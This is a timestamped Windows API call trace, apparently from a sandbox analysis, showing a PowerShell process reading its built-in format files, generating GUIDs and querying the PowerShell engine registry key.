	[0585.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0585.587] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x9897c2f9, Data2=0x23c8, Data3=0x4290, Data4=([0]=0x93, [1]=0xb1, [2]=0x4, [3]=0xc4, [4]=0xaf, [5]=0x6f, [6]=0xe3, [7]=0xcd))) returned 0x0
	[0585.588] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x8007dcc2, Data2=0x1012, Data3=0x44de, Data4=([0]=0x8f, [1]=0xc3, [2]=0x5f, [3]=0xd7, [4]=0x4e, [5]=0xb7, [6]=0xbb, [7]=0x11))) returned 0x0
	[0585.588] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x8bcc6fd9, Data2=0xf8ed, Data3=0x4d28, Data4=([0]=0xaa, [1]=0xdd, [2]=0xd7, [3]=0x57, [4]=0xea, [5]=0xe1, [6]=0x49, [7]=0x6a))) returned 0x0
	[0585.588] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xdc88c083, Data2=0x2328, Data3=0x47db, Data4=([0]=0x99, [1]=0xab, [2]=0xf1, [3]=0xba, [4]=0xde, [5]=0xb5, [6]=0xee, [7]=0x35))) returned 0x0
	[0585.588] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x2eaf184c, Data2=0x610b, Data3=0x4a06, Data4=([0]=0xaa, [1]=0xda, [2]=0x38, [3]=0xb9, [4]=0x54, [5]=0xfe, [6]=0xac, [7]=0x49))) returned 0x0
	[0585.588] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x7613081b, Data2=0xaf5e, Data3=0x401c, Data4=([0]=0x95, [1]=0xdd, [2]=0x1e, [3]=0x55, [4]=0x41, [5]=0x67, [6]=0xcb, [7]=0x6a))) returned 0x0
	[0585.589] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x7e1c0507, Data2=0xf210, Data3=0x41a9, Data4=([0]=0x8e, [1]=0xc, [2]=0x47, [3]=0xd0, [4]=0x1b, [5]=0x5e, [6]=0xed, [7]=0x43))) returned 0x0
	[0585.589] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xb228827d, Data2=0xa93, Data3=0x41fa, Data4=([0]=0x91, [1]=0x1e, [2]=0x3b, [3]=0x12, [4]=0x96, [5]=0x44, [6]=0x79, [7]=0x92))) returned 0x0
	[0585.589] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xff7f0322, Data2=0x8370, Data3=0x4704, Data4=([0]=0x85, [1]=0x20, [2]=0xb2, [3]=0xb9, [4]=0xbd, [5]=0x2d, [6]=0x6f, [7]=0x5f))) returned 0x0
	[0585.589] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xa379335b, Data2=0xacca, Data3=0x403a, Data4=([0]=0xbd, [1]=0x8, [2]=0x11, [3]=0x77, [4]=0xa8, [5]=0xee, [6]=0x16, [7]=0x9e))) returned 0x0
	[0585.589] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xf1e27c87, Data2=0x5904, Data3=0x4199, Data4=([0]=0x84, [1]=0xbb, [2]=0xcd, [3]=0xb6, [4]=0x41, [5]=0x66, [6]=0xa8, [7]=0x6b))) returned 0x0
	[0585.590] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xb9995067, Data2=0x7c7d, Data3=0x4a8b, Data4=([0]=0xa6, [1]=0xa, [2]=0xc9, [3]=0x8e, [4]=0xe7, [5]=0x73, [6]=0x50, [7]=0xd3))) returned 0x0
	[0585.590] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x7349f177, Data2=0xcc8b, Data3=0x4bee, Data4=([0]=0xbb, [1]=0x8, [2]=0x83, [3]=0xab, [4]=0x14, [5]=0xff, [6]=0x13, [7]=0x18))) returned 0x0
	[0585.590] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x41f97a4b, Data2=0xd82c, Data3=0x426f, Data4=([0]=0x98, [1]=0xc6, [2]=0x33, [3]=0x82, [4]=0x24, [5]=0xe7, [6]=0xf1, [7]=0x61))) returned 0x0
	[0585.590] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x774ec625, Data2=0xab3, Data3=0x4722, Data4=([0]=0x99, [1]=0x31, [2]=0x51, [3]=0x93, [4]=0x6f, [5]=0x33, [6]=0xe3, [7]=0x1e))) returned 0x0
	[0585.591] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x72bd24d8, Data2=0x9205, Data3=0x4c12, Data4=([0]=0x8c, [1]=0x8f, [2]=0x8, [3]=0xf4, [4]=0xbe, [5]=0x65, [6]=0x53, [7]=0x10))) returned 0x0
	[0585.591] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x21d0f9fc, Data2=0x279b, Data3=0x4cbe, Data4=([0]=0x98, [1]=0x64, [2]=0x3d, [3]=0x8a, [4]=0xc3, [5]=0x74, [6]=0x59, [7]=0x48))) returned 0x0
	[0585.591] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x118ef3af, Data2=0x36fb, Data3=0x4326, Data4=([0]=0xb5, [1]=0x1d, [2]=0x3, [3]=0x93, [4]=0xcd, [5]=0x6f, [6]=0xf6, [7]=0xc5))) returned 0x0
	[0585.591] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xc12f8fd7, Data2=0x7aba, Data3=0x424d, Data4=([0]=0x82, [1]=0xd1, [2]=0x90, [3]=0xbc, [4]=0xa9, [5]=0xad, [6]=0xc, [7]=0x79))) returned 0x0
	[0585.591] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xe2e719d4, Data2=0x5ce6, Data3=0x4de2, Data4=([0]=0x89, [1]=0x7c, [2]=0xa4, [3]=0xff, [4]=0xa8, [5]=0x26, [6]=0x2b, [7]=0x51))) returned 0x0
	[0585.592] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x1ae88818, Data2=0x2d2f, Data3=0x4c7b, Data4=([0]=0xad, [1]=0x23, [2]=0x1b, [3]=0x60, [4]=0xd0, [5]=0x58, [6]=0xab, [7]=0xe4))) returned 0x0
	[0585.592] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x136f0b7, Data2=0x445, Data3=0x4000, Data4=([0]=0x82, [1]=0x38, [2]=0x9, [3]=0x31, [4]=0xdb, [5]=0xb1, [6]=0x5a, [7]=0x2e))) returned 0x0
	[0585.592] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x1c64ae0d, Data2=0x32f9, Data3=0x455b, Data4=([0]=0xbe, [1]=0x78, [2]=0x9c, [3]=0xc9, [4]=0xa9, [5]=0x75, [6]=0x9d, [7]=0xdc))) returned 0x0
	[0585.592] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x708f5845, Data2=0x3aec, Data3=0x4332, Data4=([0]=0x93, [1]=0xc1, [2]=0xea, [3]=0x18, [4]=0x3a, [5]=0x62, [6]=0x9f, [7]=0x6e))) returned 0x0
	[0585.592] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xca63a9e3, Data2=0x544c, Data3=0x413a, Data4=([0]=0x84, [1]=0x6b, [2]=0xf3, [3]=0x82, [4]=0x60, [5]=0xb3, [6]=0x17, [7]=0x7b))) returned 0x0
	[0585.593] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xc233167d, Data2=0x1b16, Data3=0x45f5, Data4=([0]=0x84, [1]=0x33, [2]=0x5a, [3]=0xa4, [4]=0xc7, [5]=0xf0, [6]=0x17, [7]=0x89))) returned 0x0
	[0585.593] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xf2a97cbd, Data2=0x5854, Data3=0x4806, Data4=([0]=0xb2, [1]=0xf5, [2]=0xfd, [3]=0x88, [4]=0x56, [5]=0xe6, [6]=0xfc, [7]=0x67))) returned 0x0
	[0585.593] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xde6e5ea3, Data2=0x60d9, Data3=0x46c1, Data4=([0]=0x96, [1]=0x4c, [2]=0x48, [3]=0x5f, [4]=0x56, [5]=0x1a, [6]=0x2, [7]=0xdc))) returned 0x0
	[0585.593] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x6da8d157, Data2=0x3d71, Data3=0x4b3f, Data4=([0]=0xb6, [1]=0x70, [2]=0x5, [3]=0x66, [4]=0xce, [5]=0x54, [6]=0xa1, [7]=0x2))) returned 0x0
	[0585.593] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x43aa2ed8, Data2=0x3c65, Data3=0x4cba, Data4=([0]=0x98, [1]=0xc4, [2]=0x8f, [3]=0xc2, [4]=0x79, [5]=0x50, [6]=0x76, [7]=0x70))) returned 0x0
	[0585.593] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xd6a5773d, Data2=0x87eb, Data3=0x4ae6, Data4=([0]=0xa3, [1]=0xae, [2]=0x28, [3]=0x26, [4]=0x70, [5]=0xdb, [6]=0x99, [7]=0xcd))) returned 0x0
	[0585.594] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x7f35ea51, Data2=0xd18a, Data3=0x4f08, Data4=([0]=0xbd, [1]=0x55, [2]=0x9f, [3]=0x8c, [4]=0xef, [5]=0x47, [6]=0x71, [7]=0x61))) returned 0x0
	[0585.594] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x12ad16ca, Data2=0x3891, Data3=0x4f9f, Data4=([0]=0xbb, [1]=0x56, [2]=0x42, [3]=0x2, [4]=0x76, [5]=0x44, [6]=0x72, [7]=0x91))) returned 0x0
	[0585.594] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x369afd4d, Data2=0xc62, Data3=0x4e7e, Data4=([0]=0x97, [1]=0x4c, [2]=0x2a, [3]=0x9c, [4]=0x18, [5]=0xd5, [6]=0xc5, [7]=0x62))) returned 0x0
	[0585.594] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x408c2249, Data2=0x675, Data3=0x469c, Data4=([0]=0xbd, [1]=0xf3, [2]=0x96, [3]=0x11, [4]=0xe7, [5]=0x74, [6]=0x87, [7]=0x49))) returned 0x0
	[0585.594] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xa83ff8d1, Data2=0xde58, Data3=0x4bdf, Data4=([0]=0xb2, [1]=0xc, [2]=0x4f, [3]=0xd0, [4]=0xc7, [5]=0xba, [6]=0x84, [7]=0x8e))) returned 0x0
	[0585.595] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x1e31a438, Data2=0x16dd, Data3=0x441b, Data4=([0]=0x9b, [1]=0x6b, [2]=0x54, [3]=0x82, [4]=0x13, [5]=0xae, [6]=0x5, [7]=0x85))) returned 0x0
	[0585.595] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e4
	[0585.596] GetFileType (hFile=0x2e4) returned 0x1
	[0585.596] SetErrorMode (uMode=0x1) returned 0x1
	[0585.596] GetFileType (hFile=0x2e4) returned 0x1
	[0585.596] ReadFile (in: hFile=0x2e4, lpBuffer=0x33b3768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x33b3768*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.596] ReadFile (in: hFile=0x2e4, lpBuffer=0x33b3768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x33b3768*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.596] ReadFile (in: hFile=0x2e4, lpBuffer=0x33b3768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x33b3768*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.596] ReadFile (in: hFile=0x2e4, lpBuffer=0x33b3768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x33b3768*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.597] ReadFile (in: hFile=0x2e4, lpBuffer=0x33b3768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x33b3768*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.597] ReadFile (in: hFile=0x2e4, lpBuffer=0x33b3768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x33b3768*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.597] ReadFile (in: hFile=0x2e4, lpBuffer=0x33b3768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x33b3768*, lpNumberOfBytesRead=0xacfd8*=0x119, lpOverlapped=0x0) returned 1
	[0585.597] ReadFile (in: hFile=0x2e4, lpBuffer=0x33b3768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x33b3768*, lpNumberOfBytesRead=0xacfd8*=0x0, lpOverlapped=0x0) returned 1
	[0585.597] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad068 | out: phkResult=0xad068*=0x2e4) returned 0x0
	[0585.597] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xacfec, lpData=0x0, lpcbData=0xacfe8*=0x0 | out: lpType=0xacfec*=0x1, lpData=0x0, lpcbData=0xacfe8*=0x56) returned 0x0
	[0585.598] CoTaskMemAlloc (cb=0x5a) returned 0x216490
	[0585.598] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xacfbc, lpData=0x216490, lpcbData=0xacfb8*=0x56 | out: lpType=0xacfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xacfb8*=0x56) returned 0x0
	[0585.598] CoTaskMemFree (pv=0x216490) 
	[0585.598] RegCloseKey (hKey=0x2e4) returned 0x0
	[0585.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xaccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0585.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0585.599] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x886fcdbd, Data2=0xcf5f, Data3=0x4e97, Data4=([0]=0x88, [1]=0xb0, [2]=0x95, [3]=0x92, [4]=0x29, [5]=0xe5, [6]=0x13, [7]=0xc0))) returned 0x0
	[0585.599] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x84a3b713, Data2=0x4cad, Data3=0x4e99, Data4=([0]=0xb7, [1]=0x24, [2]=0x78, [3]=0x77, [4]=0x2b, [5]=0x27, [6]=0x33, [7]=0x7b))) returned 0x0
	[0585.599] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xb2637fce, Data2=0x6f8e, Data3=0x4964, Data4=([0]=0x96, [1]=0xba, [2]=0x54, [3]=0xb8, [4]=0xbf, [5]=0xa7, [6]=0x8, [7]=0x85))) returned 0x0
	[0585.600] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xec3f851e, Data2=0xce22, Data3=0x4fdc, Data4=([0]=0xb1, [1]=0x69, [2]=0x21, [3]=0x89, [4]=0x81, [5]=0x85, [6]=0x17, [7]=0xe))) returned 0x0
	[0585.600] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e4
	[0585.600] GetFileType (hFile=0x2e4) returned 0x1
	[0585.600] SetErrorMode (uMode=0x1) returned 0x1
	[0585.600] GetFileType (hFile=0x2e4) returned 0x1
	[0585.600] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.601] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.601] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.601] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.601] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.601] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.601] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.602] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.603] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.603] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.603] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.603] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.603] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.604] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.604] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.604] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.607] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.607] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.608] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.608] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.608] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.609] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.609] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.609] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.610] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.610] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.610] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.611] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.611] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.611] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.612] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.612] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.618] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.618] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.618] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.619] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.619] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.619] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.620] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.620] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
